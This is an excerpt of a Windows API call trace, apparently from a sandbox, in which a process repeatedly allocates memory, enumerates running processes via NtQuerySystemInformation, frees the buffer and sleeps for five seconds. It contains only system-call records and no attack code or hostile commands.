0x0 [0158.513] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0158.514] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0158.515] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0158.527] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0158.528] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0158.528] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0158.528] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0158.529] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0158.530] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0158.531] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0158.543] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0158.543] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0158.544] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0158.544] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0158.545] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0158.547] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0158.547] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0158.559] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0158.560] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0158.560] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0158.560] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0158.560] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0158.562] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0158.562] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0158.574] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0158.575] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0158.575] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0158.575] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0158.576] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0158.578] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0158.578] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0158.590] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0158.590] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0158.591] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0158.591] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0158.591] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0158.593] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0158.593] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0158.605] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0158.606] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0158.606] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0158.607] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0158.607] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0158.609] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0158.610] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0158.621] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0158.622] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0158.622] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0158.623] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0158.623] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0158.626] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0158.627] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0158.637] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0158.637] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0158.637] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0158.638] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0158.638] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0158.639] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0158.640] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0158.652] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0158.653] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0158.653] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0158.654] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0158.654] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0158.656] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0158.657] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0158.669] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0158.669] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0158.669] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0158.670] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0158.670] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0158.672] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0158.672] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0158.684] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0158.684] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0158.685] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0158.685] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0158.686] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0158.689] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0158.690] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0158.699] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0158.700] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0158.701] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0158.701] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0158.701] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0158.705] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0158.706] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0158.715] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0158.715] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0158.715] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0158.716] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0158.716] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0158.718] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0158.718] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0158.730] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0158.730] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0158.731] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0158.731] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0158.731] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0158.733] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0158.734] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0158.746] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0158.746] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0158.747] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0158.747] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0158.747] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0158.749] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0158.750] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0158.762] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0158.762] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0158.762] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0158.763] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0158.763] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0158.765] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0158.765] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0158.778] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0158.778] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0158.779] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0158.779] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0158.779] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0158.781] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0158.782] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0158.793] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0158.793] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0158.793] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0158.794] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0158.794] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0158.796] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0158.796] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0158.808] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0158.809] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0158.809] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0158.809] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0158.810] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0158.811] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0158.812] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0158.824] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0158.824] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0158.825] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0158.825] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0158.825] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0158.827] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0158.828] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0158.839] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0158.840] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0158.840] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0158.840] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0158.841] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0158.842] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0158.843] 